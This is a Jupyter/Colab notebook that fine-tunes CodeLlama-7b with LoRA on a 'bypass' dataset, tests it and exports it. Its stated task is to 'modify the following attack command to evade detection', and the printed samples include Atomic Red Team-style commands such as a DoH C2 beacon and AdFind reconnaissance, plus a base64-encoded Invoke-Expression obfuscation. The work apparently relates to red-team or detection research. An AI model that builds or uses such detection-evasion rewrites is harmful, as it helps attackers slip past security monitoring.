# STEP 1: Install dependencies and log in to Hugging Face

In [None]:
# %pip installs into the environment of the running kernel; -q keeps the resolver log out of the notebook.
%pip install -q transformers accelerate peft bitsandbytes datasets torch

Collecting bitsandbytes
  Downloading bitsandbytes-0.46.1-py3-none-manylinux_2_24_x86_64.whl.metadata (10 kB)
Collecting nvidia-cuda-nvrtc-cu12==12.4.127 (from torch)
  Downloading nvidia_cuda_nvrtc_cu12-12.4.127-py3-none-manylinux2014_x86_64.whl.metadata (1.5 kB)
Collecting nvidia-cuda-runtime-cu12==12.4.127 (from torch)
  Downloading nvidia_cuda_runtime_cu12-12.4.127-py3-none-manylinux2014_x86_64.whl.metadata (1.5 kB)
Collecting nvidia-cuda-cupti-cu12==12.4.127 (from torch)
  Downloading nvidia_cuda_cupti_cu12-12.4.127-py3-none-manylinux2014_x86_64.whl.metadata (1.6 kB)
Collecting nvidia-cudnn-cu12==9.1.0.70 (from torch)
  Downloading nvidia_cudnn_cu12-9.1.0.70-py3-none-manylinux2014_x86_64.whl.metadata (1.6 kB)
Collecting nvidia-cublas-cu12==12.4.5.8 (from torch)
  Downloading nvidia_cublas_cu12-12.4.5.8-py3-none-manylinux2014_x86_64.whl.metadata (1.5 kB)
Collecting nvidia-cufft-cu12==11.2.1.3 (from torch)
  Downloading nvidia_cufft_cu12-11.2.1.3-py3-none-manylinux2014_x86_64.whl.me

In [None]:
# Log in to the Hugging Face Hub. notebook_login() renders an interactive
# login widget in the cell output, so this cell needs manual input.
from huggingface_hub import notebook_login
notebook_login()

VBox(children=(HTML(value='<center> <img\nsrc=https://huggingface.co/front/assets/huggingface_logo-noborder.sv…

# STEP 2: Declare functions and start tuning

## Import libraries and dependencies

In [None]:
import torch
from datasets import load_dataset, Dataset
from peft import LoraConfig, get_peft_model, TaskType, PeftModel, prepare_model_for_kbit_training
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    TrainingArguments,
    Trainer,
    DataCollatorForLanguageModeling
)
import os
import json
import random

## Declare functions

In [None]:
def load_jsonl_dataset(file_path):
    """Read a JSON Lines file and wrap its records in a ``Dataset``.

    Lines that are empty or contain only whitespace are ignored; every other
    line is stripped and parsed with ``json.loads``.

    Args:
        file_path: Path of the UTF-8 encoded ``.jsonl`` file.

    Returns:
        The result of ``Dataset.from_list`` over the parsed records, in file
        order.
    """
    with open(file_path, 'r', encoding='utf-8') as handle:
        stripped_lines = (raw.strip() for raw in handle)
        records = [json.loads(entry) for entry in stripped_lines if entry]
    return Dataset.from_list(records)

def format_training_data(examples, eos_token="</s>"):
    """Render a batch of instruction records into training prompts.

    Each record becomes::

        ### Instruction:
        <instruction>

        ### Input:            (section omitted when the input is empty/None)
        <input>

        ### Response:
        <output><eos_token>

    Args:
        examples: Batched mapping of column name -> list of values. The
            "instruction" and "output" columns are required; "input" is
            optional.
        eos_token: End-of-sequence marker appended to every text. It must be
            the EOS token of the tokenizer used afterwards, so that it is
            encoded as the real EOS id. The previous hard-coded
            "<|endoftext|>" is not a special token of the Llama vocabulary:
            it was tokenized as ordinary text, so the model learned to spell
            the marker out instead of stopping. Pass
            ``eos_token=tokenizer.eos_token`` when using another base model.

    Returns:
        ``{"text": [...]}`` with one formatted string per input record.
    """
    instructions = examples["instruction"]
    outputs = examples["output"]
    # Datasets without an "input" column are treated as having empty inputs.
    if "input" in examples:
        inputs = examples["input"]
    else:
        inputs = [None] * len(instructions)

    texts = []
    for instruction, input_text, output_text in zip(instructions, inputs, outputs):
        if input_text:
            prompt = (
                f"### Instruction:\n{instruction}\n\n"
                f"### Input:\n{input_text}\n\n"
                "### Response:\n"
            )
        else:
            prompt = f"### Instruction:\n{instruction}\n\n### Response:\n"
        texts.append(f"{prompt}{output_text}{eos_token}")
    return {"text": texts}

def tokenize_function(examples, tokenizer, max_length=512):
    """Tokenize formatted prompts and mask the prompt part of the labels.

    Labels are a copy of ``input_ids`` in which every token up to and
    including the "### Response:\\n" marker is replaced by -100, so the loss
    is computed on the response only.

    Args:
        examples: Batched mapping with a "text" column of formatted prompts.
        tokenizer: Callable that returns a mapping with an "input_ids" list
            when called with a string (a Hugging Face tokenizer in this
            notebook).
        max_length: Truncation length applied to the full text.

    Returns:
        A dict with "input_ids", "attention_mask" (all ones, no padding is
        added here) and "labels", each a list with one entry per text.
    """
    response_marker = "### Response:\n"
    all_input_ids = []
    all_labels = []

    for text in examples["text"]:
        # Tokenize the full text (prompt + response), truncated to max_length.
        input_ids = tokenizer(
            text,
            truncation=True,
            padding=False,
            max_length=max_length,
            return_tensors=None,
        )["input_ids"]

        marker_pos = text.find(response_marker)
        if marker_pos == -1:
            # str.find() returns -1 when the marker is missing. Previously
            # that sentinel was used as an offset and an arbitrary prefix was
            # masked; without a marker the whole text is kept as target.
            prefix_length = 0
        else:
            # Tokenize the prompt on its own (untruncated) to learn how many
            # leading tokens belong to it.
            prefix_text = text[:marker_pos + len(response_marker)]
            prefix_length = len(
                tokenizer(
                    prefix_text,
                    truncation=False,
                    padding=False,
                    return_tensors=None,
                )["input_ids"]
            )

        # The prompt can be longer than the truncated sequence; never mask
        # past the end of it.
        masked = min(prefix_length, len(input_ids))
        label_ids = [-100] * masked + list(input_ids[masked:])

        all_input_ids.append(input_ids)
        all_labels.append(label_ids)

    return {
        "input_ids": all_input_ids,
        "attention_mask": [[1] * len(ids) for ids in all_input_ids],
        "labels": all_labels,
    }

## Finetune function

In [None]:
def finetune_codellama(
    dataset_path="/content/finetune_bypass_output.jsonl",
    base_model_id="codellama/CodeLlama-7b-hf",
    output_dir="./codellama-custom-finetuned",
):
    """Fine-tune a 4-bit quantized causal LM with LoRA adapters.

    Pipeline: shuffle the JSONL dataset with a fixed seed and split it 70/30,
    write both splits to /content, format and tokenize the training split,
    load the base model in 4-bit NF4, attach LoRA adapters to the attention
    projections, train, and save the result to ``output_dir``.

    Args:
        dataset_path: JSONL file with one record per line; records need the
            columns read by ``format_training_data``.
        base_model_id: Hub id of the base model and tokenizer.
        output_dir: Directory for checkpoints and the final adapter.

    Returns:
        The ``Trainer`` after training, or ``None`` when no parameter is
        trainable after the LoRA setup.
    """
    # Function-scope imports keep this cell usable even when only part of the
    # import cell was run.
    import gc, json, random
    from transformers import DataCollatorForSeq2Seq

    print("[+] Start fine-tuning CodeLLaMA...")

    # Clear GPU cache
    torch.cuda.empty_cache()
    gc.collect()

    # 1. Load dataset - SPLIT TRAIN/TEST
    print("[-] Loading and splitting dataset...")

    with open(dataset_path, "r", encoding="utf-8") as f:
        # Blank lines (e.g. a trailing newline) are skipped instead of
        # crashing json.loads.
        all_data = [json.loads(line) for line in f if line.strip()]

    # Fixed seed: the evaluation cell repeats this shuffle to rebuild the
    # same split.
    random.seed(42)
    random.shuffle(all_data)

    # Split 70% train, 30% test
    split_idx = int(0.7 * len(all_data))
    train_data = all_data[:split_idx]
    test_data = all_data[split_idx:]

    # Write both splits to disk so later cells can reuse them
    with open("/content/train_data.jsonl", "w", encoding="utf-8") as f:
        for d in train_data:
            f.write(json.dumps(d) + "\n")

    with open("/content/test_data.jsonl", "w", encoding="utf-8") as f:
        for d in test_data:
            f.write(json.dumps(d) + "\n")

    print(f"[+] Done splitting data: {len(train_data)} train / {len(test_data)} test")

    # Create the Hugging Face dataset from the list of records
    data = Dataset.from_list(train_data)
    print(f"[+] Loaded {len(data)} training examples")

    # 2. Load tokenizer
    print("[-] Loading tokenizer...")
    tokenizer = AutoTokenizer.from_pretrained(base_model_id)
    # The tokenizer has no dedicated pad token; EOS is reused for padding.
    # Labels are padded separately with -100 by the collator below, so this
    # reuse does not mask real EOS targets.
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.padding_side = "right"

    # 3. Format dataset
    print("[-] Formatting dataset...")
    formatted_data = data.map(
        format_training_data,
        batched=True,
        remove_columns=data.column_names
    )

    # 4. Tokenize dataset
    print("[-] Tokenizing dataset...")
    tokenized_data = formatted_data.map(
        lambda x: tokenize_function(x, tokenizer),
        batched=True,
        remove_columns=formatted_data.column_names
    )

    # Examples whose prompt alone fills the truncation window have every
    # label set to -100; they carry no training signal and would produce an
    # undefined loss, so they are dropped.
    examples_before = len(tokenized_data)
    tokenized_data = tokenized_data.filter(
        lambda ex: any(label != -100 for label in ex["labels"])
    )
    dropped = examples_before - len(tokenized_data)
    if dropped:
        print(f"[!] Dropped {dropped} examples without any response tokens after truncation")

    # 5. Load model with quantization
    print("[-] Loading model...")
    bnb_config = BitsAndBytesConfig(
        load_in_4bit=True,
        bnb_4bit_quant_type="nf4",
        bnb_4bit_compute_dtype=torch.float16,
        bnb_4bit_use_double_quant=True,
    )

    # trust_remote_code is not passed: the architecture ships with
    # transformers, so no repository code needs to be executed.
    model = AutoModelForCausalLM.from_pretrained(
        base_model_id,
        quantization_config=bnb_config,
        device_map="auto",
        torch_dtype=torch.float16,
    )

    # Prepare model for k-bit training
    model = prepare_model_for_kbit_training(model)
    model.config.use_cache = False  # the KV cache is useless while training
    model.config.pretraining_tp = 1
    model.gradient_checkpointing_enable()

    # Clear cache after loading
    torch.cuda.empty_cache()

    # 6. Setup LoRA
    print("[-] Setting up LoRA...")

    # Enable input embedding gradients for LoRA
    model.enable_input_require_grads()

    peft_config = LoraConfig(
        task_type=TaskType.CAUSAL_LM,
        inference_mode=False,
        r=16,
        lora_alpha=32,
        lora_dropout=0.1,
        target_modules=["q_proj", "v_proj", "k_proj", "o_proj"],
        bias="none",
    )

    model = get_peft_model(model, peft_config)

    # Verify trainable parameters
    model.print_trainable_parameters()

    # Additional check for gradient requirements
    trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
    if trainable_params == 0:
        print("[x] ERROR: No trainable parameters found!")
        return None
    else:
        print(f"[+] Found {trainable_params:,} trainable parameters")

    # 7. Setup training arguments - EXTREME MEMORY OPTIMIZATION
    print("[-] Setting up training...")
    training_args = TrainingArguments(
        output_dir=output_dir,
        per_device_train_batch_size=1,
        gradient_accumulation_steps=4,
        learning_rate=2e-4,
        # max_steps overrides num_train_epochs, so only the step budget is
        # given: 400 optimizer steps x 4 accumulated samples = 1,600 samples.
        max_steps=400,
        logging_steps=50,
        # save_steps is ignored with an epoch-based strategy, so it is not set.
        save_strategy="epoch",
        save_total_limit=2,
        fp16=True,
        optim="paged_adamw_8bit",
        lr_scheduler_type="cosine",
        warmup_steps=100,
        group_by_length=True,
        dataloader_drop_last=True,
        # The string "none" disables reporting integrations; the Python value
        # None did not, and training logged to W&B.
        report_to="none",
        push_to_hub=False,
        dataloader_num_workers=0,
        remove_unused_columns=False,
        # PeftModel hides the base model signature, so Trainer cannot infer
        # the label column on its own.
        label_names=["labels"],
        eval_strategy="no",
        prediction_loss_only=True,
        dataloader_pin_memory=False,
        skip_memory_metrics=True,
    )

    # 8. Data collator
    # DataCollatorForLanguageModeling(mlm=False) rebuilds the labels from
    # input_ids, which throws away the prompt masking done in
    # tokenize_function and also masks EOS because pad == eos.
    # DataCollatorForSeq2Seq keeps the provided labels and pads them with -100.
    data_collator = DataCollatorForSeq2Seq(
        tokenizer=tokenizer,
        padding=True,
        pad_to_multiple_of=8,
        label_pad_token_id=-100,
        return_tensors="pt",
    )

    # 9. Trainer
    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=tokenized_data,
        data_collator=data_collator,
        # `tokenizer=` is deprecated on Trainer in favour of `processing_class`.
        processing_class=tokenizer,
    )

    # 10. Train
    print("[-] Starting training...")
    trainer.train()

    # 11. Save model
    print("[-] Saving model...")
    trainer.save_model()

    print("[+] Training completed!")
    return trainer

## Start training

In [None]:
# Run the whole fine-tuning pipeline. The result is the Trainer, or None when
# the LoRA setup found no trainable parameters.
trainer = finetune_codellama()

[+] Start fine-tuning CodeLLaMA...
[-] Loading and splitting dataset...
[+] Done splitting data: 4711 train / 2019 test
[+] Loaded 4711 training examples
[-] Loading tokenizer...


The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


[-] Formatting dataset...


Map:   0%|          | 0/4711 [00:00<?, ? examples/s]

[-] Tokenizing dataset...


Map:   0%|          | 0/4711 [00:00<?, ? examples/s]

[-] Loading model...


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

[-] Setting up LoRA...


  trainer = Trainer(
No label_names provided for model class `PeftModelForCausalLM`. Since `PeftModel` hides base models input arguments, if label_names is not given, label_names can't be set automatically within `Trainer`. Note that empty label_names list will be used instead.


trainable params: 16,777,216 || all params: 6,755,323,904 || trainable%: 0.2484
[+] Found 16,777,216 trainable parameters
[-] Setting up training...
[-] Starting training...


[34m[1mwandb[0m: Currently logged in as: [33mthuyvy-tranthi04[0m ([33mthuyvy-tranthi04-university-of-information-technology[0m) to [32mhttps://api.wandb.ai[0m. Use [1m`wandb login --relogin`[0m to force relogin


Step,Training Loss
50,1.4774
100,0.9174
150,0.7749
200,0.7908
250,0.7593
300,0.6738
350,0.7351
400,0.7167


[-] Saving model...
[+] Training completed!


# Additional: Steps to work with Google Drive

In [None]:
# Mount Google Drive at /content/drive so the adapter and merged model can be
# stored outside the Colab session.
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


## Create folder

In [None]:
import os
# Target folder on Drive for the adapter and merged model; exist_ok makes the
# cell safe to re-run.
os.makedirs("/content/drive/MyDrive/finetune_lora", exist_ok=True)

## Uncomment and run this if you want to load the model from your Drive

In [None]:
# !cp -r /content/drive/MyDrive/finetune_lora/codellama-custom-finetuned /content/codellama-custom-finetuned
# !cp -r /content/drive/MyDrive/finetune_lora/merged_model_fp16 /content/merged_model_fp16

# STEP 3: Merge the model and save it to your Drive

## Save pre-merged model to your drive

In [None]:
# Replace the folder name below if you changed the training output directory.
# Copying "<source>/." into an existing target keeps a re-run from nesting a
# second copy of the folder inside the first one.
!mkdir -p /content/drive/MyDrive/finetune_lora/codellama-custom-finetuned
!cp -r /content/codellama-custom-finetuned/. /content/drive/MyDrive/finetune_lora/codellama-custom-finetuned/

## Merge and save merged model to drive

In [None]:
from transformers import AutoTokenizer, AutoModelForCausalLM
from peft import PeftModel
import torch

# Base checkpoint the LoRA adapter was trained on.
base_model_id = "codellama/CodeLlama-7b-hf"

# Replace with your model's name #####################################################
lora_model_path = "/content/drive/MyDrive/finetune_lora/codellama-custom-finetuned" ##
######################################################################################

# Destination of the merged fp16 model (read again by the test cell below).
merged_model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"

# Load the base model in fp16 (not quantized), so the adapter is merged into
# half-precision weights.
base_model = AutoModelForCausalLM.from_pretrained(
    base_model_id,
    device_map="auto",
    torch_dtype=torch.float16,
    trust_remote_code=True,
)

# Attach the trained LoRA adapter to the base model
lora_model = PeftModel.from_pretrained(
    base_model,
    lora_model_path,
    torch_dtype=torch.float16,
)

# Fold the adapter weights into the base weights and save the merged model.
# Only the model is saved here; the tokenizer is written to the same folder by
# a later cell.
merged_model = lora_model.merge_and_unload()
merged_model.save_pretrained(merged_model_path)

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

# Test finetuned model

## Download dependencies
### Uncomment this only if you load the model from your Drive

In [None]:
#!pip install transformers accelerate bitsandbytes peft



## Load the merged model and tokenizer

In [None]:
from transformers import AutoTokenizer, AutoModelForCausalLM, pipeline
import torch

# Folder that holds the merged fp16 model written by the merge step.
model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"

# Load the tokenizer from the base model
tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
# Same padding setup as during training: EOS doubles as the pad token.
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right"

# Save the tokenizer into the merged model folder (same path as model_path)
merged_model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"
tokenizer.save_pretrained(merged_model_path)

# Load the merged model; `model` and `tokenizer` are used as globals by
# generate_response below.
model = AutoModelForCausalLM.from_pretrained(model_path, device_map="auto", torch_dtype=torch.float16, trust_remote_code=True)

The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


Loading checkpoint shards:   0%|          | 0/3 [00:00<?, ?it/s]

## Test model on test set

In [None]:
# 1. Load dataset - SPLIT TRAIN/TEST
# Rebuilds the same 70/30 split as the fine-tuning function (same file, same
# seed, same shuffle), so the test split is available even when training was
# skipped and the model was loaded from Drive.
# Imported here so the cell also runs in a fresh session where the STEP 2
# import cell was not executed.
import json
import random

print("[-] Loading and splitting dataset...")

original_path = "/content/finetune_bypass_output.jsonl"

with open(original_path, "r", encoding="utf-8") as f:
    # Skip blank lines (e.g. a trailing newline) instead of failing on them.
    all_data = [json.loads(line) for line in f if line.strip()]

random.seed(42)
random.shuffle(all_data)

# Split 70% train, 30% test
split_idx = int(0.7 * len(all_data))
train_data = all_data[:split_idx]
test_data = all_data[split_idx:]

# Write both splits to disk
with open("/content/train_data.jsonl", "w", encoding="utf-8") as f:
    for d in train_data:
        f.write(json.dumps(d) + "\n")

with open("/content/test_data.jsonl", "w", encoding="utf-8") as f:
    for d in test_data:
        f.write(json.dumps(d) + "\n")

[-] Loading and splitting dataset...


In [None]:
from tqdm import tqdm
import json

# Load the held-out test split; blank lines are skipped instead of crashing
# json.loads.
with open("/content/test_data.jsonl", "r", encoding="utf-8") as f:
    test_data = [json.loads(line) for line in f if line.strip()]

def build_prompt(
    command: str,
    instruction: str = "Modify the following attack command to evade detection.",
) -> str:
    """Build the inference prompt in the same layout used for training.

    Args:
        command: Text placed in the "### Input:" section. When it is empty or
            None the section is left out, which is what the training
            formatter does for records without an input.
        instruction: Text of the "### Instruction:" section. The default is
            the instruction that was previously hard-coded here.

    Returns:
        The prompt, ending with "### Response:\\n" so the model continues
        with the response.
    """
    if command:
        return (
            f"### Instruction:\n{instruction}\n\n"
            f"### Input:\n{command}\n\n"
            "### Response:\n"
        )
    return f"### Instruction:\n{instruction}\n\n### Response:\n"

def extract_response_only(full_output: str, original_prompt: str) -> str:
    """Extract the response part of a decoded generation, dropping the prompt.

    Args:
        full_output: Decoded model output (prompt followed by the
            continuation).
        original_prompt: Unused; kept so existing callers keep working.

    Returns:
        The text after the first "### Response:" marker, cut at the first
        end-of-text marker, with every line stripped, blank lines removed and
        anything from the next "###" section header onwards discarded. When
        the marker is missing the stripped ``full_output`` is returned. On an
        unexpected error the result is "[PARSING_ERROR] <message>".
    """
    response_marker = "### Response:"
    end_marker = "<|endoftext|>"
    try:
        if response_marker not in full_output:
            return full_output.strip()

        response_part = full_output.split(response_marker, 1)[1].strip()

        # Whatever follows an end marker is not part of the answer. The
        # markers used to be deleted in place, which glued that trailing text
        # onto the response.
        for stop in (end_marker, "</s>"):
            response_part = response_part.split(stop, 1)[0]

        # Generation can be cut by the token limit in the middle of the
        # textual end marker (e.g. "...<|endoftext|"); drop such a dangling
        # fragment. Fragments shorter than two characters are left alone
        # because a lone "<" can be real content.
        for cut in range(len(end_marker) - 1, 1, -1):
            if response_part.endswith(end_marker[:cut]):
                response_part = response_part[:-cut]
                break

        clean_lines = []
        for line in response_part.split('\n'):
            line = line.strip()
            if line.startswith('###'):
                # The model started a new prompt section; stop here.
                break
            if line:
                clean_lines.append(line)

        return '\n'.join(clean_lines).strip()

    except Exception as e:
        return f"[PARSING_ERROR] {str(e)}"

def generate_response(command: str, max_retries: int = 3) -> str:
    """Generate a response for ``command`` with the globally loaded model.

    Uses the module-level ``tokenizer`` and ``model``. Sampling is enabled,
    so a retry can produce a different result.

    Args:
        command: Text inserted into the prompt by ``build_prompt``.
        max_retries: Number of attempts. An attempt is repeated when it
            raises, yields an empty response, or yields a parsing error.

    Returns:
        The extracted response, "[GENERATION_ERROR] <message>" when the last
        attempt raised, or "[GENERATION_FAILED] Max retries exceeded" when no
        attempt produced a usable response.
    """
    prompt = build_prompt(command)

    for attempt in range(max_retries):
        try:
            inputs = tokenizer(prompt, return_tensors="pt").to(model.device)

            with torch.no_grad():
                # early_stopping only applies to beam search; with sampling
                # it is rejected as an invalid flag and produced a warning on
                # every call, so it is not passed.
                outputs = model.generate(
                    **inputs,
                    max_new_tokens=100,
                    min_new_tokens=5,
                    do_sample=True,
                    temperature=0.7,
                    top_p=0.9,
                    top_k=50,
                    repetition_penalty=1.15,
                    pad_token_id=tokenizer.eos_token_id,
                    eos_token_id=tokenizer.eos_token_id,
                    num_return_sequences=1,
                )

            full_output = tokenizer.decode(outputs[0], skip_special_tokens=True)

            response = extract_response_only(full_output, prompt)

            # extract_response_only reports problems with a "[PARSING_ERROR]"
            # prefix; the previous "[ERROR]" check could never match it.
            if response and response.strip() and not response.startswith("[PARSING_ERROR]"):
                return response

        except Exception as e:
            # Only the last failure is reported; earlier ones are retried.
            if attempt == max_retries - 1:
                return f"[GENERATION_ERROR] {str(e)}"

    return "[GENERATION_FAILED] Max retries exceeded"

# Prefixes that the generation helpers put at the start of their result when
# something went wrong.
_FAILURE_MARKERS = (
    "[GENERATION_ERROR]",
    "[GENERATION_FAILED]",
    "[PARSING_ERROR]",
    "[CRITICAL_ERROR]",
)


def _is_failed_output(text: str) -> bool:
    """Return True when ``text`` starts with one of the failure markers."""
    return str(text).startswith(_FAILURE_MARKERS)


# Quick smoke test on the first three test examples before the long run.
print("\n[-] Testing with some examples...")
sample_tests = test_data[:3]
for i, example in enumerate(sample_tests):
    command = example["input"]
    expected = example["output"]

    print(f"\n--- Test {i+1} ---")
    print(f"Input: {command}")
    print(f"Expected: {expected}")

    generated = generate_response(command)
    print(f"Generated: {generated}")
    print("-" * 50)

# The full run is slow, so it only starts after explicit confirmation.
user_input = input("\n[-] Continue to full test? (y/n): ")

if user_input.strip().lower() in ['y', 'yes']:
    print("\n[-] Starting full test...")

    results = []
    failed_count = 0

    for example in tqdm(test_data, desc="[-] Testing on full test set"):
        command = example["input"]
        expected = example["output"]

        try:
            generated = generate_response(command)
        except Exception as e:
            generated = f"[CRITICAL_ERROR] {str(e)}"

        # Every failure marker counts, including parsing and critical errors
        # that the previous substring checks let through.
        if _is_failed_output(generated):
            failed_count += 1

        results.append({
            "input": command,
            "output_expected": expected,
            "output_model": generated
        })

    # Save results
    output_file = "/content/model_test_results.jsonl"
    with open(output_file, "w", encoding="utf-8") as f:
        for r in results:
            f.write(json.dumps(r, ensure_ascii=False) + "\n")

    print(f"\n[+] Testing completed!")
    print(f"[-] Results: {len(results)} total, {failed_count} failed")
    print(f"[-] Results saved to: {output_file}")

    if results:
        # "Success" only means that a response was generated; the exact-match
        # rate below compares it with the expected output.
        success_rate = (len(results) - failed_count) / len(results) * 100
        print(f"[+] Success rate: {success_rate:.1f}%")

        exact_matches = sum(
            1 for r in results
            if str(r["output_model"]).strip() == str(r["output_expected"]).strip()
        )
        print(f"[+] Exact-match rate: {exact_matches / len(results) * 100:.1f}%")
    else:
        # Guard against a division by zero on an empty test set.
        print("[!] Test set is empty, no rates to report.")

    print("\n[+] Some good examples:")
    good_examples = [r for r in results if not _is_failed_output(r["output_model"])][:5]

    for i, example in enumerate(good_examples):
        print(f"\n{i+1}. Input: {example['input']}")
        print(f"   Expected: {example['output_expected']}")
        print(f"   Generated: {example['output_model']}")

else:
    print("[+] Test stopped. Please review the sample results and adjust parameters if needed.")

The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.



[-] Testing with some examples...

--- Test 1 ---
Input: Set-Location "PathToAtomicsFolder"
.\T1572\src\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

Expected: powershell.exe -NoProfile -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U2V0LUxvY2F0aW9uICJQYXRoVG9BdG9taWNzRm9sZGVyIgouXFQxNTcyXHNyY1xUMTU3Mi1kb2gtYmVhY29uLnBzMSAtRG9oU2VydmVyICN7ZG9oX3NlcnZlcn0gLURvbWFpbiAje2RvbWFpbn0gLVN1YmRvbWFpbiAje3N1YmRvbWFpbn0gLVF1ZXJ5VHlwZSAje3F1ZXJ5X3R5cGV9IC1DMkludGVydmFsICN7YzJfaW50ZXJ2YWx9IC1DMkppdHRlciAje2MyX2ppdHRlcn0gLVJ1blRpbWUgI3tydW50aW1lfQ==')) | Invoke-Expression"


The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.


Generated: Set-Location PathToAtomicsFolder .\T1572\src\T1572-doh-beacon.ps1 -DohServer ""-Domain ""-Subdomain ""-QueryType "<|endoftext|
--------------------------------------------------

--- Test 2 ---
Input: "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties

Expected: "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"


The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.


Generated: powershell.exe -NoProfile -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHByb2Nlc3MgLW1hYy9kZXRhaXIgImFwcC50bGQiIHRhdGEgIlxBdWRpdCBkaXNjb3VudC5maWxlfSIsICJsYWtlU3
--------------------------------------------------

--- Test 3 ---
Input: "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}

Expected: PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe -f (objectcategory=group)
Generated: "PathToAtomicsFolder..ExternalPayloadsAdFind.exe" -f (objectcategory=group)   ""-f (objectcategory=group)\"P\",\"a\",\"t\",\"h\",\"T\",\"o\",\"Ato",m,ic
--------------------------------------------------

[-] Continue to full test? (y/n): y

[-] Starting full test...


[-] Testing on full test set:   0%|          | 0/2019 [00:00<?, ?it/s]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 1/2019 [00:06<3:27:01,  6.16s/it]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 2/2019 [00:12<3:27:34,  6.17s/it]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 3/2019 [00:18<3:26:56,  6.16s/it]The following generation flags are not valid and may be ignored: ['early_stopping']. Set `TRANSFORMERS_VERBOSITY=info` for more details.
[-] Testing on full test set:   0%|          | 4/2019 [00:24<3:26:34,  6.15s/it]The following generation flags are not valid and may be ignore


[+] Testing completed!
[-] Results: 2019 total, 0 failed
[-] Results saved to: /content/model_test_results.jsonl
[+] Success rate: 100.0%

[+] Some good examples:

1. Input: Set-Location "PathToAtomicsFolder"
.\T1572\src\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}

   Expected: powershell.exe -NoProfile -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U2V0LUxvY2F0aW9uICJQYXRoVG9BdG9taWNzRm9sZGVyIgouXFQxNTcyXHNyY1xUMTU3Mi1kb2gtYmVhY29uLnBzMSAtRG9oU2VydmVyICN7ZG9oX3NlcnZlcn0gLURvbWFpbiAje2RvbWFpbn0gLVN1YmRvbWFpbiAje3N1YmRvbWFpbn0gLVF1ZXJ5VHlwZSAje3F1ZXJ5X3R5cGV9IC1DMkludGVydmFsICN7YzJfaW50ZXJ2YWx9IC1DMkppdHRlciAje2MyX2ppdHRlcn0gLVJ1blRpbWUgI3tydW50aW1lfQ==')) | Invoke-Expression"
   Generated: Set-Location PathToAtomicsFolder .\T1572\src\T1572-doh-beacon.ps1 -DohServer -Domain -Subdomain -QueryType -C2Interval -C2Jitter -Runtime




# Upload model gguf to HF

## Download dependencies

In [None]:
# %pip installs into the environment of the running kernel.
%pip install -q llama-cpp-python huggingface_hub
# Clone only when the checkout is missing, so the cell can be re-run.
!test -d llama.cpp || git clone https://github.com/ggerganov/llama.cpp.git

Collecting llama-cpp-python
  Downloading llama_cpp_python-0.3.9.tar.gz (67.9 MB)
[2K     [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m67.9/67.9 MB[0m [31m9.9 MB/s[0m eta [36m0:00:00[0m
[?25h  Installing build dependencies ... [?25l[?25hdone
  Getting requirements to build wheel ... [?25l[?25hdone
  Installing backend dependencies ... [?25l[?25hdone
  Preparing metadata (pyproject.toml) ... [?25l[?25hdone
Collecting diskcache>=5.6.1 (from llama-cpp-python)
  Downloading diskcache-5.6.3-py3-none-any.whl.metadata (20 kB)
Downloading diskcache-5.6.3-py3-none-any.whl (45 kB)
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m45.5/45.5 kB[0m [31m3.5 MB/s[0m eta [36m0:00:00[0m
[?25hBuilding wheels for collected packages: llama-cpp-python
